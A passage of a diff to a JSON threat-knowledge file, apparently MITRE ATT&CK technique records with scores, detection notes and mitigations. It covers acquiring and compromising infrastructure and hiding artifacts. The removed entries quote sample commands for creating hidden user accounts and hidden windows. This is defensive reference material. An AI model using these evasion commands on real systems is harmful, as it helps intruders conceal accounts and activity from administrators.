+        "detection": "Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content",
+            "Internet Scan: Response Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1583",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
-            },
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1583.005",
+        "name": "Acquire Infrastructure: Botnet",
+        "description": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)",
+        "url": "https://attack.mitre.org/techniques/T1583/005",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1583",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.4525924823809524,
-        "adjusted_score": 0.4525924823809524,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "2.3",
-            "2.5",
-            "3.12",
-            "4.1",
-            "4.2",
-            "4.4",
-            "4.7",
-            "4.8",
-            "5.3",
-            "6.1",
-            "6.2",
-            "6.8",
-            "7.6",
-            "12.2",
-            "12.8",
-            "18.3",
-            "18.5",
-            "16.10"
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1583.006",
+        "name": "Acquire Infrastructure: Web Services",
+        "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
+        "url": "https://attack.mitre.org/techniques/T1583/006",
+        "tactics": [
+            "Resource Development"
         ],
-        "nist_controls": [
-            "AC-17",
-            "AC-2",
-            "AC-3",
-            "AC-4",
-            "AC-5",
-            "AC-6",
-            "CA-8",
-            "CM-2",
-            "CM-5",
-            "CM-6",
-            "CM-7",
-            "CM-8",
-            "IA-2",
-            "IA-4",
-            "IA-6",
-            "RA-5",
-            "SC-46",
-            "SC-7",
-            "SI-4"
+        "detection": "Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).",
+        "platforms": [
+            "PRE"
         ],
-        "process_coverage": true,
-        "network_coverage": true,
-        "file_coverage": true,
+        "data_sources": [
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1583",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.3523809523809524,
-            "mitigation_score": 0.6727272727272727
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00021153
+        "hardware_coverage": false
     },
     {
-        "tid": "T1564",
-        "name": "Hide Artifacts",
-        "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)",
-        "url": "https://attack.mitre.org/techniques/T1564",
+        "tid": "T1584",
+        "name": "Compromise Infrastructure",
+        "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)",
+        "url": "https://attack.mitre.org/techniques/T1584",
         "tactics": [
-            "Defense Evasion"
+            "Resource Development"
         ],
-        "detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.",
+        "detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. \n\nOnce adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
         "platforms": [
-            "Linux",
-            "Office 365",
-            "Windows",
-            "macOS"
+            "PRE"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "Command: Command Execution",
-            "File: File Creation",
-            "File: File Metadata",
-            "File: File Modification",
-            "Firmware: Firmware Modification",
-            "Process: OS API Execution",
-            "Process: Process Creation",
-            "Script: Script Execution",
-            "Service: Service Creation",
-            "User Account: User Account Creation",
-            "User Account: User Account Metadata",
-            "Windows Registry: Windows Registry Key Modification"
+            "Domain Name: Active DNS",
+            "Domain Name: Domain Registration",
+            "Domain Name: Passive DNS",
+            "Internet Scan: Response Content",
+            "Internet Scan: Response Metadata"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1564.001",
-                "name": "Hide Artifacts: Hidden Files and Directories",
-                "url": "https://attack.mitre.org/techniques/T1564/001",
-                "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
-                "detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1564.002",
-                "name": "Hide Artifacts: Hidden Users",
-                "url": "https://attack.mitre.org/techniques/T1564/002",
-                "description": "Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.\n\nIn macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)\n\nIn Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)",
-                "detection": "This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, \"hidden\" users may still get a home directory and will appear in the authentication logs.\n\nMonitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList key.",
+                "tid": "T1584.001",
+                "name": "Compromise Infrastructure: Domains",
+                "url": "https://attack.mitre.org/techniques/T1584/001",
+                "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)",
+                "detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
                 "mitigations": [
                     {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1564.003",
-                "name": "Hide Artifacts: Hidden Window",
-                "url": "https://attack.mitre.org/techniques/T1564/003",
-                "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nOn Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)",
-                "detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.",
+                "tid": "T1584.002",
+                "name": "Compromise Infrastructure: DNS Server",
+                "url": "https://attack.mitre.org/techniques/T1584/002",
+                "description": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\n\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)",
+                "detection": "Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
                 "mitigations": [
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1564.004",
-                "name": "Hide Artifacts: NTFS File Attributes",
-                "url": "https://attack.mitre.org/techniques/T1564/004",
-                "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)",
-                "detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
+                "tid": "T1584.003",
+                "name": "Compromise Infrastructure: Virtual Private Server",
+                "url": "https://attack.mitre.org/techniques/T1584/003",
+                "description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)\n\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.",
+                "detection": "Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
                 "mitigations": [
                     {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1564.005",
-                "name": "Hide Artifacts: Hidden File System",
-                "url": "https://attack.mitre.org/techniques/T1564/005",
-                "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)",
-                "detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.",
-                "mitigations": []
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
+                    }
+                ]
             },
             {
-                "tid": "T1564.006",
-                "name": "Hide Artifacts: Run Virtual Instance",
-                "url": "https://attack.mitre.org/techniques/T1564/006",
-                "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)",
-                "detection": "Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.\n\nConsider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. -silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages \"all\").\n\nMonitor for commands which enable hypervisors such as Hyper-V.  If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \n\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.",
+                "tid": "T1584.004",
+                "name": "Compromise Infrastructure: Server",
+                "url": "https://attack.mitre.org/techniques/T1584/004",
+                "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
+                "detection": "Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
                 "mitigations": [
                     {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1564.007",
-                "name": "Hide Artifacts: VBA Stomping",
-                "url": "https://attack.mitre.org/techniques/T1564/007",
-                "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)",
-                "detection": "Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\n\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)",
+                "tid": "T1584.005",
+                "name": "Compromise Infrastructure: Botnet",
+                "url": "https://attack.mitre.org/techniques/T1584/005",
+                "description": "Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).",
+                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).",
                 "mitigations": [
                     {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1564.008",
-                "name": "Hide Artifacts: Email Hiding Rules",
-                "url": "https://attack.mitre.org/techniques/T1564/008",
